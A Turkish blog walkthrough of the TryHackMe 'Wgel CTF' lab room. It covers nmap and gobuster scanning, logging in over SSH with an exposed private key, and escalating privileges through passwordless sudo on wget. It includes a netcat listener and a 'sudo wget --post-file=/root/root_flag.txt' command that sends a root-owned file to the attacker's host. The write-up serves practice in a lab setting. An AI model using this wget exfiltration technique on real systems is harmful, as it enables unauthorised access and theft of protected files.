Eren Yılmaz tarafından 31 Ocak 2021 tarihinde yazılmıştır.
Merhaba bu makalemizde tryhackme'de bulunan Wgel CTF isimli odayı hep beraber çözeceğiz, başlayalım.İlk önce agresif bir nmap taraması yapıyoruz, nmap ağ hakkında aktif bilgi toplayabileceğimiz bir bilgi toplama aracıdır.
namp -A 10.10.213.167
2 adet açık bağlantı noktamız var, biri 80 diğeri ise 22 numaralı bağlantı noktası. 80 numaralı bağlantı noktasında bir adet web sitesi ayakta, 22 numaralı bağlantı noktasında ise ssh servisi ayakta. Biz herkese açık olduğu için webden yürüyelim, dizinleri aramak için gobuster isimli aracı kullanabiliriz.
gobuster dir -u http://10.10.213.167/ -w common.txt
1 adet dizin bulduk, sitemap dizininde fazla bir şey bulamıyoruz bu yüzden sitemap dizinine de bir adet dizin taraması yapıyoruz.
Ve evet! bir adet ssh anahtarı bulduk.gobuster dir -u http://10.10.213.167/sitemap -w common.txt
bununla birlikte oturum açabiliriz ama bize bir kullanıcı ismi lazım bunun için sitenin kaynak koduna baktığımızda şöyle bir metin görüyoruz.
<!-- Jessie don't forget to udate the webiste -->
Bu metinden yola çıkarak kullanıcın isminin "Jessie" olduğunu anlıyoruz, şimdi ssh'a bağlanacağız. Bağlanmadan önce id_rsa dosyasına belirli izinler tanımlamamız gerekli, aşağıdaki şekilde tanımlayabiliriz.
Şimdi ssh'a bağlanalım.chmod 600 id_rsa
Ve evet içerideyiz!ssh -i id_rsa [email protected]
İçerideki dizinleri biraz araştırdığımızda kullanıcı bayrağının doküman dizininde olduğunu görüyoruz, bayrağı okumak için cat veya less araçlarını kullanabiliriz. Neyse bayrağa bakalım.
cd Documents
cat user_flag.txt
less user_flag.txt (alternatif)
Şimdi yetkimizi yükseltmemiz gerekli, bunun için ilk önce nerelerin yönetici yetkisine ihtiyaç duyduğuna bakmalıyız, aşağıdaki komutu kullanabiliriz.
sudo -l
Komutun çıktısına baktığımızda /usr/bin/wget adresinde şifresiz bir şekilde yönetici olabileceğimizi görüyoruz, bunu istismar edebiliriz. İstismar etmek için detaylı kaynak olarak burayı kullanabilirsiniz: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/ . Şimdi orada verilen komutu girerek makinemizi istismar edelim.
İlk önce netcat ile kendi bilgisayarımızı dinlemeye almalıyız.
Şimdi karşı makinede şu komutu girelim, ip adresi yazılan kısıma tryhackme'nin size tanımladığı ip'yi girmelisiniz.nc -lvnp 5050
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.9.30.197:5050
Flag
Burada wget dizinini kullandığımızdan dolayı yönetici izni alırken makine bizden şifre istemedi, şimdi netcat ile dinleme yaptığımız terminal sekmesine gidip bize herhangi bir tepki vermiş mi? diye bir bakalım. Evet vermiş! yönetici bayrağımızın değeri karşımızda, bayrağı girip makineyi bitirelim.Daha fazla içerik için sitemizi takip edebilirsiniz!